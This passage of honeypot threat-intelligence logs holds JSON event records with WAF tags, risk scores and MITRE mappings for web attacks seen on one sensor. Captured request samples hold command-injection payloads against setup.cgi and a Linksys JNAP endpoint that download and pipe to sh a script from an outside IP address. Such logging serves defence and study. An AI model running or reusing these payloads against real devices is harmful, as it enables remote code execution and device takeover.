\u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_goform\u0022, \u0022http_sensitive_path\u0022, \u0022net_web_probe\u0022], \u0022behavior_alert_count\u0022: 1, \u0022behavior_priority\u0022: 84}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_goform\u0022, \u0022http_sensitive_path\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":293},{"id":11809678,"ip":"45.153.34.252","ts":"2026-07-14 02:29:36.000000","proto":"tcp","src_port":47890,"dst_port":8081,"service":"http","classification":"http_smuggling_probe","waf_score":52,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 394, \u0022payload_entropy\u0022: 5.301432592761045, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 80, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002257aad11ef2fd1ed6172b22d4f3d610095842e981\u0022, \u0022event_fingerprint\u0022: \u0022fa4fb497c394ece581353e50ea95b8971050cbe3\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 84, \u0022precision_signals\u0022: [\u0022pat-0842\u0022], \u0022kb_rule_ids\u0022: [\u0022pat-0842\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 80}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002291a699e728a441a03b894f19441512ac\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 80}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationin\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationinfo\/GetStationInfo\\r\\nContent-Length: 205\\r\\nConnection: close\\r\\n\\r\\ndevice_name=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7C\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationin\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationinfo\/GetStationInfo\\r\\nContent-Length: 205\\r\\nConnection: close\\r\\n\\r\\ndevice_name=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7C\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationin\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022web_injection\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002217a4756c52b1539b0e8f95787baeaf452beb67c9\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationin\u0022, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 80\/100 (\u00c9lev\u00e9) \u2014 MITRE TA0001 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 80}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 80, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022pat-0842\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022pat-0842\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationin\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":394},{"id":11809675,"ip":"45.153.34.252","ts":"2026-07-14 02:29:35.000000","proto":"tcp","src_port":47876,"dst_port":8081,"service":"http","classification":"config_file_probe","waf_score":41,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022168f355f1e9166b8bc52e0f454202978f12fb305\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 280, \u0022payload_entropy\u0022: 5.068386919107891, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022b98be878427c79e5e060d464e8e372ddbc3bb762\u0022, \u0022event_fingerprint\u0022: \u002287f03c8f6d384639056f2eb7a1a521418b74d6ab\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022762d78833d4be125e755f4697e1d469b\u0022, \u0022path_pattern_hash\u0022: \u00227a793259e7957dbaff63a0c99d83e638\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022query_string\u0022: \u0022next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022query_string\u0022: \u0022next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup HTTP\/1.1\\r\\nHost: 62.3.50.33:808\u0022, \u0022payload_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00226a20c6ab09954982af333347807e0752f29d2b4b\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lset\u2026\u0022, \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 6 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, 